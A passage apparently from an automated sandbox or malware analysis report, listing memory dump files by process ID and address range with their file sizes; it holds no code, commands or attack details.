                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-63-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-64-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-71-0x00007FFF0AFD0000-0x00007FFF0B08E000-memory.dmp

                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/2128-59-0x000001D977F80000-0x000001D977FAA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/2128-49-0x000001D977BE0000-0x000001D977C02000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/2128-60-0x00007FFF0C170000-0x00007FFF0C365000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/2128-61-0x00007FFF0AFD0000-0x00007FFF0B08E000-memory.dmp

                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/4064-28-0x00007FFEEDB30000-0x00007FFEEE5F1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4064-0-0x00007FFEEDB33000-0x00007FFEEDB35000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4064-3-0x00007FFEEDB30000-0x00007FFEEE5F1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4064-1-0x00000000001B0000-0x000000000027A000-memory.dmp

                                                                                                                Filesize

                                                                                                                808KB

                                                                                                              • memory/4224-34-0x00007FFEEDB30000-0x00007FFEEE5F1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4224-27-0x00007FFEEDB30000-0x00007FFEEE5F1000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/4224-26-0x00000264F7EC0000-0x00000264F8010000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.3MB

                                                                                                              • memory/4808-43-0x0000000006E00000-0x0000000006E0A000-memory.dmp

                                                                                                                Filesize

                                                                                                                40KB